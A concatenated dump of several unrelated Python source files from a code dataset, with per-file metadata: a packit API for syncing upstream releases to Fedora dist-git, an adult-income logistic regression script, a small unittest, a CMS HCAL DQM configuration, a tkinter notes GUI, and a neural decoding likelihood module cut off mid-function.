print(cal_accuracy(file_list, top_dict))\n \n \n ","sub_path":"tf_files/mobilenet/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"504870585","text":"\"\"\"\nThis is the official python interface for packit.\n\"\"\"\n\nimport logging\n\nfrom packit.config import Config, PackageConfig\nfrom packit.distgit import DistGit\nfrom packit.upstream import Upstream\n\nlogger = logging.getLogger(__name__)\n\n\nclass PackitAPI:\n def __init__(self, config: Config, package_config: PackageConfig) -> None:\n self.config = config\n self.package_config = package_config\n\n def sync_pr(self, pr_id, dist_git_branch: str, upstream_version: str = None):\n up = Upstream(config=self.config, package_config=self.package_config)\n\n dg = DistGit(config=self.config, package_config=self.package_config)\n\n up.checkout_pr(pr_id=pr_id)\n local_pr_branch = f\"pull-request-{pr_id}-sync\"\n # fetch and reset --hard upstream/$branch?\n dg.checkout_branch(dist_git_branch)\n dg.create_branch(local_pr_branch)\n dg.checkout_branch(local_pr_branch)\n\n dg.sync_files(up.local_project)\n\n patches = up.create_patches(\n upstream=upstream_version, destination=dg.local_project.working_dir\n )\n dg.add_patches_to_specfile(patches)\n\n description = (\n f\"Upstream pr: {pr_id}\\n\"\n f\"Upstream commit: {up.local_project.git_repo.head.commit}\\n\"\n )\n\n self.sync(\n distgit=dg,\n commit_msg=f\"Sync upstream pr: {pr_id}\",\n pr_title=f\"Upstream pr: {pr_id}\",\n pr_description=description,\n dist_git_branch=\"master\",\n add_new_sources=False,\n )\n\n def sync_release(self, dist_git_branch: str, version: str = None):\n \"\"\"\n Update given package in Fedora\n \"\"\"\n up = Upstream(config=self.config, package_config=self.package_config)\n\n dg = DistGit(config=self.config, package_config=self.package_config)\n\n full_version = version or up.get_upstream_version()\n current_up_branch = up.active_branch\n try:\n # TODO: this is problematic, since we may overwrite stuff in the repo\n # but the thing is that we need to do it\n # I feel like the ideal thing to do would be to clone the repo and work in tmpdir\n # TODO: this is also naive, upstream may use different tagging scheme, e.g.\n # release = 232, tag = v232\n up.checkout_release(full_version)\n\n local_pr_branch = f\"{full_version}-{dist_git_branch}-update\"\n # fetch and reset --hard upstream/$branch?\n logger.info(f'using \"{dist_git_branch}\" dist-git branch')\n dg.checkout_branch(dist_git_branch)\n dg.create_branch(local_pr_branch)\n dg.checkout_branch(local_pr_branch)\n\n description = (\n f\"Upstream tag: {full_version}\\n\"\n f\"Upstream commit: {up.local_project.git_repo.head.commit}\\n\"\n )\n\n dg.sync_files(up.local_project)\n\n self.sync(\n distgit=dg,\n commit_msg=f\"{full_version} upstream release\",\n pr_title=f\"Update to upstream release {full_version}\",\n pr_description=description,\n dist_git_branch=dist_git_branch,\n commit_msg_description=description,\n add_new_sources=True,\n )\n finally:\n current_up_branch.checkout()\n\n def sync(\n self,\n distgit: DistGit,\n commit_msg: str,\n pr_title: str,\n pr_description: str,\n dist_git_branch: str,\n commit_msg_description: str = None,\n add_new_sources=False,\n ):\n\n if add_new_sources:\n archive = distgit.download_upstream_archive()\n distgit.upload_to_lookaside_cache(archive)\n\n distgit.commit(title=commit_msg, msg=commit_msg_description)\n # the branch may already be up, let's push forcefully\n distgit.push_to_fork(distgit.local_project.ref, force=True)\n distgit.create_pull(\n pr_title,\n pr_description,\n source_branch=distgit.local_project.ref,\n target_branch=dist_git_branch,\n )\n","sub_path":"packit/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"265146649","text":"#####################Import the packages \nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt \n\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import LogisticRegression\n\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, classification_report\n\n\n####################IMPORT THE DATABASE\n\ncolumns = ['age', 'workclass', 'fnlwgt', 'education', 'educational-num','marital-status', 'occupation', 'relationship', 'race', 'gender','capital-gain', 'capital-loss', 'hours-per-week', 'native-country','income']\n\n\ntrain = pd.read_csv('adult_data.txt', sep=\",\\s\", header=None, names = columns, engine = 'python')\ntest = pd.read_csv('adult_test.txt', sep=\",\\s\", header=None, names = columns, engine = 'python')\ntest['income'].replace(regex=True,inplace=True,to_replace=r'\\.',value=r'')\n\n\nadult = pd.concat([test,train])\nadult.reset_index(inplace = True, drop = True)\n\n# Setting all the categorical columns to type category\nfor col in set(adult.columns) - set(adult.describe().columns):\n adult[col] = adult[col].astype('category')\n\n\nfor i,j in zip(adult.columns,(adult.values.astype(str) == '?').sum(axis = 0)):\n if j > 0:\n print(str(i) + ': ' + str(j) + ' records')\n\n\n# Create one hot encoding of the categorical columns in the data frame.\ndef oneHotCatVars(df, df_cols):\n df_1 = adult_data = df.drop(columns=df_cols, axis=1)\n df_2 = pd.get_dummies(df[df_cols])\n\n return (pd.concat([df_1, df_2], axis=1, join='inner'))\n\n\n\n\n\nmajority_class = adult.workclass.value_counts().index[0]\n\n\nadult.loc[(adult.workclass.values == '?'),'workclass'] = majority_class\n\n\n\ntest_data = adult[(adult.occupation.values == '?')].copy()\ntest_label = test_data.occupation\n\nmajority_class = adult.occupation.value_counts().index[0]\n\n\nadult.loc[(adult.occupation.values == '?'),'occupation'] = majority_class\nprint(adult.occupation.unique())\n\nmajority_class = adult['native-country'].value_counts().index[0]\nadult.loc[(adult['native-country'].values == '?'),'native-country'] = majority_class\n\"\"\"\nadult['workclass'] = adult['workclass'].cat.remove_categories('?')\nadult['occupation'] = adult['occupation'].cat.remove_categories('?')\nadult['native-country'] = adult['native-country'].cat.remove_categories('?')\n\n\"\"\"\n########### Preparing data for Training and testing\n\n# Data Prep\nadult_data = adult.drop(columns = ['income'])\nadult_label = adult.income\n\n\nadult_cat_1hot = pd.get_dummies(adult_data.select_dtypes('category'))\nadult_non_cat = adult_data.select_dtypes(exclude = 'category')\n\nadult_data_1hot = pd.concat([adult_non_cat, adult_cat_1hot], axis=1, join='inner')\ntrain_data, test_data, train_label, test_label = train_test_split(adult_data_1hot, adult_label, test_size = 0.25)\n\n# Normalization\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler()\n\n# Fitting only on training data\nscaler.fit(train_data)\ntrain_data = scaler.transform(train_data)\n\n# Applying same transformation to test data\ntest_data = scaler.transform(test_data)\n\nimport pickle\n\n\nlog_reg = LogisticRegression(penalty = 'l2', dual = False, tol = 1e-4, fit_intercept = True,\n solver = 'liblinear')\ndataset = {}\ndataset['train_data'] = train_data\ndataset['test_data'] = test_data\ndataset['train_label'] = train_label\ndataset['test_label'] = test_label\nlog_reg.fit(train_data, train_label)\nlog_reg_pred = log_reg.predict(test_data)\n\nfile_Name = \"adult.data\"\n# open the file for writing\nfileObject = open(file_Name, 'wb')\n\n# this writes the object a to the\n# file named 'testfile'\npickle.dump(dataset, fileObject)\nprint(log_reg.score(test_data,test_label))\n","sub_path":"adult/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"370947651","text":"import unittest\r\nfrom city_function import city_country\r\n\r\nclass CityTestCases(unittest.TestCase):\r\n\tdef test_city_country(self):\r\n\t\tformatted_city = city_country('kyiv', 'ukraine')\r\n\t\tself.assertEqual(formatted_city,'Kyiv, Ukraine')\r\n\r\n\tdef test_with_population(self):\r\n\t\tformatted_city = city_country('kyiv','ukraine', 42000000)\r\n\t\tself.assertEqual(formatted_city, 'Kyiv, Ukraine - population 42000000 people')\r\n\r\nunittest.main()","sub_path":"test_city_function.py","file_name":"test_city_function.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"544847881","text":"import FWCore.ParameterSet.Config as cms\nfrom DQM.HcalMonitorModule.HcalMonitorModule_cfi import * # Can this be done better?\nfrom DQM.HcalMonitorClient.HcalMonitorClient_cfi import * \n\nmaxevents=-1\ncheckNevents=1000\n\nprocess = cms.Process(\"HCALDQM\")\n#----------------------------\n# Event Source\n#-----------------------------\nprocess.load(\"DQM.Integration.test.inputsource_playback_cfi\")\nprocess.EventStreamHttpReader.consumerName = 'Hcal DQM Consumer'\n\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(maxevents)\n )\n\n#process.source = cms.Source(\"EventStreamHttpReader\",\n# #sourceURL = cms.string('http://srv-C2D05-05:50082/urn:xdaq-application:lid=29'),\n# sourceURL = cms.string('http://cmsmondev:50082/urn:xdaq-application:lid=29'),\n# consumerPriority = cms.untracked.string('normal'),\n# max_event_size = cms.int32(7000000),\n# consumerName = cms.untracked.string('Playback Source'),\n# max_queue_depth = cms.int32(5),\n# maxEventRequestRate = cms.untracked.double(10.0),\n# SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('*')\n# ),\n# headerRetryInterval = cms.untracked.int32(3)\n# )\n\nprocess.source = cms.Source(\"PoolSource\",\n\n fileNames = cms.untracked.vstring\n (\n #'/store/data/Commissioning08/Cosmics/RAW/v1/000/069/987/32803ED3-54AD-DD11-BA3D-000423D94E1C.root',\n '/store/data/Commissioning09/Cosmics/RAW/v1/000/079/159/FEEA7F80-581A-DE11-A9B2-000423D98DD4.root'\n )\n\n )\n\n\n#----------------------------\n# DQM Environment\n#-----------------------------\nprocess.load(\"DQMServices.Core.DQM_cfg\")\nprocess.load(\"DQMServices.Components.DQMEnvironment_cfi\")\n#process.DQMStore.referenceFileName = '/home/dqmdevlocal/reference/hcal_reference.root'\n\n#----------------------------\n# DQM Playback Environment\n#-----------------------------\nprocess.load(\"DQM.Integration.test.environment_playback_cfi\")\nprocess.dqmEnv.subSystemFolder = \"Hcal\"\n\nprocess.DQM.collectorHost = 'lxplus228.cern.ch' # change to whichever computer you are using\nprocess.DQM.collectorPort = 9190\nprocess.dqmSaver.dirName = '/tmp/temple/dqmdata'\nprocess.dqmSaver.producer = \"DQM\"\n\n#-----------------------------\n# Hcal Conditions: from Global Conditions Tag \n#-----------------------------\n\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nprocess.GlobalTag.globaltag = \"CRAFT_30X::All\"\nprocess.es_prefer_GlobalTag = cms.ESPrefer('PoolDBESSource','GlobalTag')\n\n#process.GlobalTag.connect = \"frontier://(proxyurl=http://localhost:3128)(serverurl=http://frontier1.cms:8000/FrontierOnProd)(serverurl=http://frontier2.cms:8000/FrontierOnProd)(retrieve-ziplevel=0)/CMS_COND_21X_GLOBALTAG\"\n\n\nprocess.prefer(\"GlobalTag\")\n\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\n\n\n#-----------------------------\n# Hcal DQM Source, including SimpleReconstrctor\n#-----------------------------\nprocess.load(\"DQM.HcalMonitorModule.HcalMonitorModule_cfi\")\nprocess.load(\"EventFilter.HcalRawToDigi.HcalRawToDigi_cfi\")\nprocess.load(\"RecoLocalCalo.HcalRecProducers.HcalSimpleReconstructor_hbhe_cfi\")\nprocess.load(\"RecoLocalCalo.HcalRecProducers.HcalSimpleReconstructor_ho_cfi\")\nprocess.load(\"RecoLocalCalo.HcalRecProducers.HcalSimpleReconstructor_hf_cfi\")\nprocess.load(\"RecoLocalCalo.HcalRecProducers.HcalSimpleReconstructor_zdc_cfi\")\n\n# This line is necessary for releases > 3_9_0_pre4\n# Earlier CMSSW versions should comment out this line \nprocess.hbhereco = process.hbheprereco.clone()\n\n# hcalMonitor configurable values -----------------------\nprocess.hcalMonitor.debug = 0\n#process.hcalMonitor.DigiOccThresh = -999999999 ##Temporary measure while DigiOcc is reworked.\nprocess.hcalMonitor.pedestalsInFC = True\nprocess.hcalMonitor.showTiming = False\nprocess.hcalMonitor.checkNevents=checkNevents\nprocess.hcalMonitor.dump2database = False\n\n# Turn on/off individual hcalMonitor modules ------------\nprocess.hcalMonitor.DataFormatMonitor = True\nprocess.hcalMonitor.DataIntegrityTask = True\nprocess.hcalMonitor.DigiMonitor = True\nprocess.hcalMonitor.RecHitMonitor = True\nprocess.hcalMonitor.TrigPrimMonitor = False\nprocess.hcalMonitor.DeadCellMonitor = True\nprocess.hcalMonitor.HotCellMonitor = True\nprocess.hcalMonitor.BeamMonitor = True\nprocess.hcalMonitor.PedestalMonitor = True\nprocess.hcalMonitor.LEDMonitor = False\nprocess.hcalMonitor.CaloTowerMonitor = False\nprocess.hcalMonitor.MTCCMonitor = False\nprocess.hcalMonitor.HcalAnalysis = False\n\n# This takes the default cfg values from the hcalMonitor base class and applies them to the subtasks.\nsetHcalTaskValues(process.hcalMonitor)\n\n# Set individual Task values here (otherwise they will remain set to the values specified for the hcalMonitor.)\nprocess.hcalMonitor.DeadCellMonitor_pedestal_Nsigma = 0\nprocess.hcalMonitor.DeadCellMonitor_makeDiagnosticPlots = False\nprocess.hcalMonitor.DeadCellMonitor_test_pedestal = True\nprocess.hcalMonitor.DeadCellMonitor_test_occupancy = True\nprocess.hcalMonitor.DeadCellMonitor_test_neighbor = False\n\nprocess.hcalMonitor.HotCellMonitor_makeDiagnosticPlots = False\nprocess.hcalMonitor.HotCellMonitor_test_neighbor = False\n\n#-----------------------------\n# Hcal DQM Client\n#-----------------------------\nprocess.load(\"DQM.HcalMonitorClient.HcalMonitorClient_cfi\")\n\n# hcalClient configurable values ------------------------\n# suppresses html output from HCalClient \nprocess.hcalClient.baseHtmlDir = '' # set to '' to prevent html output\n\n# Set client settings to the same as monitor. At the moment, this doesn't affect client minErrorFlag\n# Summary Client is also unaffected\nsetHcalClientValuesFromMonitor(process.hcalClient,process.hcalMonitor, debug=False) # turn debug to True to dump out client settings\n\nprocess.hcalClient.SummaryClient = True\n\n#-----------------------------\n# Scheduling\n#-----------------------------\nprocess.options = cms.untracked.PSet(\n Rethrow = cms.untracked.vstring('ProductNotFound', \n 'TooManyProducts', \n 'TooFewProducts')\n)\n\nprocess.p = cms.Path(process.hcalDigis*process.horeco*process.hfreco*process.hbhereco*process.zdcreco*process.hcalMonitor*process.hcalClient*process.dqmEnv*process.dqmSaver)\n\n\n#-----------------------------\n# Quality Tester \n# will add switch to select histograms to be saved soon\n#-----------------------------\nprocess.qTester = cms.EDFilter(\"QualityTester\",\n prescaleFactor = cms.untracked.int32(1),\n qtList = cms.untracked.FileInPath('DQM/HcalMonitorClient/data/hcal_qualitytest_config.xml'),\n getQualityTestsFromFile = cms.untracked.bool(True)\n)\n\n","sub_path":"DQM/HcalMonitorModule/python/hcal_dqm_sourceclient-playback_cfg.py","file_name":"hcal_dqm_sourceclient-playback_cfg.py","file_ext":"py","file_size_in_byte":6979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"162134256","text":"import datetime\r\n\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\n\r\nfrom logic.day_overview import DayOverviewController\r\n\r\n\r\nclass DayOverview(tk.Frame):\r\n def __init__(self, parent):\r\n super().__init__(parent)\r\n self.grid_columnconfigure(0, weight=1, minsize=1000)\r\n self.grid_columnconfigure(1, weight=0, minsize=150)\r\n self.grid_rowconfigure(0, weight=0, minsize=70)\r\n self.grid_rowconfigure(1, weight=1, minsize=350)\r\n\r\n self.controller = DayOverviewController()\r\n\r\n top_box = tk.Frame(self, background='red')\r\n top_box.grid(row=0, column=0, sticky='nsew')\r\n\r\n navigation = tk.Frame(top_box, background='blue')\r\n navigation.pack(fill='both', expand=True)\r\n # navigation.place(relx=0.5, rely=0.5, anchor='center')\r\n\r\n left_btn = tk.Button(navigation, text='<-')\r\n left_btn.pack(side='left', expand=True, fill='both')\r\n left_btn.config(command=self.controller.prev_day, font=(\"Courier\", 15))\r\n\r\n date_var = tk.StringVar()\r\n date_var.set('TESTSS')\r\n date_var.trace_add('write', lambda *args: self.controller.date.set_string(date_var.get()))\r\n self.controller.date.on_change(lambda data: date_var.set(data))\r\n\r\n date_lbl = tk.Label(navigation, textvariable=date_var, width=20)\r\n date_lbl.pack(side='left', expand=True, fill='both')\r\n date_lbl.config(font=('Courier', 15))\r\n\r\n right_btn = tk.Button(navigation, text='->')\r\n right_btn.pack(side='left', expand=True, fill='both')\r\n right_btn.config(command=self.controller.next_day, font=(\"Courier\", 15))\r\n\r\n tree = BetterTreeview(self)\r\n headers = tuple((name, int(ratio * 800)) for name, ratio in self.controller.header)\r\n tree.set_headers(headers)\r\n tree.grid(row=1, column=0, sticky='nsew')\r\n tree.bind('', lambda event: self.create_edit_note())\r\n tree.on_add_item_func = self.controller.note_list.add_item_without_event\r\n self.controller.note_list.on_add_item_func = tree.add_item_without_event\r\n self.controller.note_list.on_set_by_func = tree.set_by_index\r\n self.controller.note_list.on_move_item_func = tree.move_item\r\n\r\n # Frame of buttons\r\n menu = tk.Frame(self, width=100)\r\n menu.grid(row=1, column=1, sticky='nsew')\r\n\r\n button_kwargs = dict(ipady=31, ipadx=50)\r\n\r\n add_btn = tk.Button(menu, text='Add')\r\n add_btn.config(command=self.create_add_note)\r\n add_btn.pack(side='top', fill='both', **button_kwargs)\r\n\r\n edit_btn = tk.Button(menu, text='Edit')\r\n edit_btn.config(command=self.create_edit_note)\r\n edit_btn.pack(side='top', fill='both', **button_kwargs)\r\n\r\n delete_btn = tk.Button(menu, text='Delete')\r\n delete_btn.config(command=self.delete_note)\r\n delete_btn.pack(side='top', fill='both', **button_kwargs)\r\n\r\n refresh_btn = tk.Button(menu, text='Refresh')\r\n refresh_btn.config(command=self.controller.refresh)\r\n refresh_btn.pack(side='top', fill='both', **button_kwargs)\r\n\r\n self.treeview = tree\r\n self.add_btn = add_btn\r\n self.edit_btn = edit_btn\r\n\r\n self.controller.clear_list_func = self.clear_list\r\n # self.controller.init_values(async_mode=True)\r\n\r\n def clear_list(self):\r\n for i in self.treeview.get_children():\r\n self.treeview.delete(i)\r\n\r\n def create_note_popup(self, id=None, on_store_data=lambda note: None, time=None):\r\n new_window = tk.Toplevel(self)\r\n from .note_form import AddNotesView\r\n add_note = AddNotesView(new_window, id=id, time=time)\r\n add_note.pack(side='top', fill='both', expand=True)\r\n add_note.on_store_data = on_store_data\r\n\r\n def create_add_note(self):\r\n if self.controller.date.get(as_string=False) == datetime.date.today():\r\n time_to_use = datetime.datetime.now()\r\n else:\r\n time_to_use = datetime.datetime.combine(self.controller.date.get(as_string=False), datetime.datetime.min.time())\r\n self.create_note_popup(on_store_data=self.controller.add_note, time=time_to_use)\r\n\r\n def create_edit_note(self):\r\n item = self.treeview.focus()\r\n if item is None:\r\n return\r\n index = self.treeview.index(item)\r\n id = self.controller.get_selected_note_id(index)\r\n self.create_note_popup(id=id, on_store_data=self.controller.edit_note)\r\n\r\n def delete_note(self):\r\n item = self.treeview.focus()\r\n if item is None:\r\n return\r\n index = self.treeview.index(item)\r\n if self.controller.delete(index):\r\n self.treeview.delete(item)\r\n # print([self.treeview.item(i, 'values')[4] for i in self.treeview.get_children()], '\\n', [n[4] for n in self.controller.note_list.get()])\r\n\r\n\r\nclass Navigation():\r\n pass\r\n\r\n\r\nclass BetterTreeview(ttk.Treeview):\r\n def __init__(self, master=None, **kw):\r\n super().__init__(master, **kw)\r\n self['show'] = 'headings'\r\n self['selectmode'] = 'browse'\r\n self.on_add_item_func = lambda values, index: None\r\n\r\n def set_headers(self, headers_tuple):\r\n header_names = tuple(h[0] for h in headers_tuple)\r\n self['columns'] = header_names\r\n for header, width in headers_tuple:\r\n self.heading(header, text=header, anchor='w')\r\n self.column(header, width=width)\r\n\r\n def set_by_index(self, index, value):\r\n for i, item in enumerate(self.get_children()):\r\n if i == index:\r\n self.item(item, values=value)\r\n return\r\n\r\n def move_item(self, old_index, new_index):\r\n old_item = self.get_children()[old_index]\r\n self.move(old_item, '', new_index)\r\n\r\n def add_item_without_event(self, values, index=None):\r\n # attach to root, append to end, values is tuple of values to add\r\n # hmmm\r\n # if index is not None and index < len(self.get_children()):\r\n # self.delete(self.get_children()[index])\r\n self.insert('', 'end' if index is None else index, value=values)\r\n\r\n def add_item(self, values, index=None): # TODO: add event for appending here\r\n self.add_item_without_event(values, 'end' if index is None else index)\r\n self.on_add_item_func(values, index)\r\n","sub_path":"k0haku_notes/views_tk/day_overview_list.py","file_name":"day_overview_list.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"632348998","text":"'''\n'''\n\nfrom functools import partial\n\nimport numpy as np\nfrom tqdm.autonotebook import tqdm\n\nfrom .core import atleast_2d\n\n\ndef multiunit_likelihood(multiunit, position, place_bin_centers,\n occupancy_model, joint_models, marginal_models,\n mean_rates, time_bin_size=1):\n '''The likelihood of being in a replay state vs. not a replay state based\n on whether the multiunits correspond to the current position of the animal.\n\n Parameters\n ----------\n multiunit : ndarray, shape (n_time, n_marks, n_electrodes)\n position : ndarray, shape (n_time,)\n place_bin_centers : ndarray, shape (n_place_bins,)\n occupancy_model : list of fitted density models, len (n_electrodes)\n joint_models : list of fitted density models, len (n_electrodes)\n marginal_models : list of fitted density models, len (n_electrodes)\n mean_rates : list of floats, len (n_electrodes)\n time_bin_size : float, optional\n\n Returns\n -------\n multiunit_likelihood : ndarray, shape (n_time, 2, n_place_bins)\n\n '''\n n_time = multiunit.shape[0]\n n_place_bins = place_bin_centers.size\n multiunit_likelihood = np.zeros((n_time, 2, n_place_bins))\n multiunit_likelihood[:, 1, :] = np.exp(estimate_replay_log_likelihood(\n np.moveaxis(multiunit, -1, 0), place_bin_centers,\n occupancy_model, joint_models, marginal_models, mean_rates,\n time_bin_size))\n multiunit_likelihood[:, 0, :] = np.exp(estimate_no_replay_log_likelihood(\n np.moveaxis(multiunit, -1, 0), position, occupancy_model,\n joint_models, marginal_models, mean_rates, time_bin_size))\n\n return multiunit_likelihood\n\n\ndef estimate_replay_log_likelihood(\n multiunits, place_bin_centers, occupancy_model,\n joint_models, marginal_models, mean_rates, time_bin_size):\n '''Estimate the log likelihood of being at any position.\n\n Parameters\n ----------\n multiunits : ndarray, shape (n_electrodes, n_time, n_features)\n place_bin_centers : ndarray, shape (n_place_bins,)\n occupancy_model : fitted density model\n marginal_models : list of fitted density models, len (n_electrodes,)\n mean_rates : list of floats, shape (n_electrodes,)\n time_bin_size : float\n\n Returns\n -------\n replay_log_likelihood : ndarray, shape (n_time, n_place_bins)\n\n '''\n\n n_bin = place_bin_centers.size\n n_time = multiunits.shape[1]\n log_likelihood = np.zeros((n_time, n_bin))\n\n occupancy = estimate_occupancy(place_bin_centers, occupancy_model)\n\n for multiunit, joint_model, marginal_model, mean_rate in zip(\n tqdm(multiunits, desc='electrodes'), joint_models, marginal_models,\n mean_rates):\n ground_process_intensity = np.atleast_2d(\n estimate_ground_process_intensity(\n place_bin_centers, occupancy, marginal_model, mean_rate))\n log_joint_mark_intensity = np.stack([\n estimate_log_joint_mark_intensity(\n multiunit, place_bin * np.ones((n_time, 1)), joint_model,\n mean_rate, occ * np.ones((n_time,)))\n for occ, place_bin in zip(occupancy, place_bin_centers)], axis=1)\n log_likelihood += poisson_mark_log_likelihood(\n log_joint_mark_intensity, ground_process_intensity, time_bin_size)\n\n return log_likelihood\n\n\ndef estimate_no_replay_log_likelihood(\n multiunits, position, occupancy_model,\n joint_models, marginal_models, mean_rates, time_bin_size):\n '''Estimate the log likelihood of being at the current position.\n\n Parameters\n ----------\n multiunits : ndarray, shape (n_electrodes, n_time, n_features)\n position : ndarray, shape (n_time, n_position_dims)\n occupancy_model : fitted density model\n joint_models : list of fitted density models, len (n_electrodes,)\n marginal_models : list of fitted density models, len (n_electrodes,)\n mean_rates : list of floats, len (n_electrodes,)\n time_bin_size : float\n\n Returns\n -------\n no_replay_log_likelihood : ndarray, shape (n_time,)\n\n '''\n n_time = multiunits.shape[1]\n log_likelihood = np.zeros((n_time, 1))\n\n occupancy = estimate_occupancy(position, occupancy_model)\n\n for multiunit, joint_model, marginal_model, mean_rate in zip(\n tqdm(multiunits, desc='electrodes'), joint_models, marginal_models,\n mean_rates):\n ground_process_intensity = estimate_ground_process_intensity(\n position, occupancy, marginal_model, mean_rate)[:, np.newaxis]\n log_joint_mark_intensity = estimate_log_joint_mark_intensity(\n multiunit, position, joint_model, mean_rate, occupancy\n )[:, np.newaxis]\n log_likelihood += poisson_mark_log_likelihood(\n log_joint_mark_intensity, ground_process_intensity,\n time_bin_size)\n\n return log_likelihood\n\n\ndef poisson_mark_log_likelihood(log_joint_mark_intensity,\n ground_process_intensity, time_bin_size=1):\n '''Probability of parameters given spiking indicator at a particular\n time and associated marks.\n\n Parameters\n ----------\n log_joint_mark_intensity : ndarray, shape (n_time, n_position)\n ground_process_intensity : ndarray, shape (n_time, n_position)\n Probability of observing a spike regardless of multiunit.\n time_bin_size : float, optional\n\n Returns\n -------\n poisson_mark_log_likelihood : ndarray, shape (n_time, n_position)\n\n '''\n return np.log(time_bin_size) + log_joint_mark_intensity - (\n ground_process_intensity * time_bin_size)\n\n\ndef estimate_occupancy(position, occupancy_model):\n '''Computes the spatial occupancy.\n\n Parameters\n ----------\n position : ndarray, shape (n_time, n_position_dims)\n occupancy_model : fitted density model\n\n Returns\n -------\n occupancy : ndarray, shape (n_time,)\n\n '''\n position = atleast_2d(position)\n not_nan_position = np.all(~np.isnan(position), axis=1)\n occupancy = np.full((position.shape[0],), np.nan)\n occupancy[not_nan_position] = np.exp(\n occupancy_model.score_samples(position[not_nan_position]))\n return occupancy\n\n\ndef estimate_ground_process_intensity(position, occupancy,\n marginal_model, mean_rate):\n '''Computes the rate function of position marginalized over mark.\n\n Parameters\n ----------\n position : ndarray, shape (n_time, n_position_dims)\n occupancy : ndarray, shape (n_position_dims,)\n marginal_model : fitted density model\n mean_rate : float\n\n Returns\n -------\n ground_process_intensity : ndarray, shape (n_time,)\n\n '''\n place_field = marginal_model.score_samples(atleast_2d(position))\n return np.exp(np.log(mean_rate) + place_field - np.log(occupancy))\n\n\ndef estimate_log_joint_mark_intensity(\n multiunit, position, joint_model, mean_rate, occupancy):\n '''Computes the rate function of position and mark.\n\n Parameters\n ----------\n multiunit : ndarray, shape (n_time, n_features)\n position : ndarray, shape (n_time, n_position_dims)\n joint_model : fitted density model\n mean_rate : float\n occupancy : ndarray, shape (n_time,)\n\n Returns\n -------\n log_joint_mark_intensity : ndarray, shape (n_time,)\n\n '''\n multiunit, position = atleast_2d(multiunit), atleast_2d(position)\n is_spike = (np.any(~np.isnan(multiunit), axis=1) &\n np.all(~np.isnan(position), axis=1))\n not_nan_marks = np.any(~np.isnan(multiunit), axis=0)\n\n log_joint_mark_intensity = np.zeros((position.shape[0],))\n log_joint_mark_intensity[is_spike] = (\n np.log(mean_rate) +\n joint_model.score_samples(np.concatenate(\n (multiunit[is_spike][:, not_nan_marks], position[is_spike]),\n axis=1)) - np.log(occupancy[is_spike]))\n return log_joint_mark_intensity\n\n\ndef train_marginal_model(multiunit, position, density_model, model_kwargs):\n '''\n\n Parameters\n ----------\n multiunit : ndarray, shape (n_time, n_features)\n position : ndarray, shape (n_time, n_position_dims)\n density_model : class\n model_kwargs : dict\n\n Returns\n -------\n fitted_marginal_model : density_model class instance\n\n '''\n is_spike = np.any(~np.isnan(multiunit), axis=1)\n not_nan_position = np.all(~np.isnan(atleast_2d(position)), axis=1)\n return (density_model(**model_kwargs)\n .fit(atleast_2d(position)[is_spike & not_nan_position]))\n\n\ndef train_occupancy_model(position, density_model, model_kwargs):\n '''Fits a density model for computing the spatial occupancy.\n\n Parameters\n ----------\n position : ndarray, shape (n_time, n_position_dims)\n density_model : class\n model_kwargs : dict\n\n Returns\n -------\n fitted_occupancy_model : density_model class instance\n\n '''\n position = atleast_2d(position)\n not_nan_position = np.all(~np.isnan(atleast_2d(position)), axis=1)\n return density_model(**model_kwargs).fit(position[not_nan_position])\n\n\ndef train_joint_model(multiunit, position, density_model, model_kwargs):\n '''Fits a density model to the joint pdf of position and mark.\n\n Parameters\n ----------\n multiunit : ndarray, shape (n_time, n_features)\n position : ndarray, shape (n_time, n_position_dims)\n density_model : class\n model_kwargs : dict\n\n Returns\n -------\n fitted_joint_model : density_model class instance\n\n '''\n multiunit, position = atleast_2d(multiunit), atleast_2d(position)\n is_spike = (np.any(~np.isnan(multiunit), axis=1) &\n np.all(~np.isnan(position), axis=1))\n not_nan_marks = np.any(~np.isnan(multiunit), axis=0)\n\n return (density_model(**model_kwargs)\n .fit(np.concatenate((multiunit[is_spike][:, not_nan_marks],\n position[is_spike]), axis=1)))\n\n\ndef estimate_mean_rate(multiunit, position):\n '''Mean rate of multiunit.\n\n Parameters\n ----------\n multiunit : ndarray, shape (n_time, n_features)\n position : ndarray, shape (n_time, n_position_dims)\n\n Returns\n -------\n mean_rate : float\n\n '''\n is_spike = np.any(~np.isnan(multiunit), axis=1)\n not_nan = np.all(~np.isnan(atleast_2d(position)), axis=1)\n return np.mean(is_spike[not_nan])\n\n\ndef fit_multiunit_likelihood(position, multiunit, is_replay,\n place_bin_centers,\n density_model, model_kwargs,\n occupancy_marginal_model, occupancy_kwargs):\n '''Precompute quantities to fit the multiunit likelihood to new data.\n\n Parameters\n ----------\n position : ndarray, shape (n_time, n_position_dims)\n multiunit : ndarray, shape (n_time, n_features, n_electrodes)\n is_replay : bool ndarray, shape (n_time,)\n place_bin_centers : ndarray, shape (n_place_bins,)\n model : Class\n model_kwargs : dict\n\n Returns\n -------\n multiunit_likelihood : function\n\n '''\n joint_models = []\n marginal_models = []\n mean_rates = []\n occupancy_model = train_occupancy_model(\n position[~is_replay], occupancy_marginal_model, occupancy_kwargs)\n\n for m in tqdm(np.moveaxis(multiunit[~is_replay], -1, 0),\n desc='electrodes'):\n 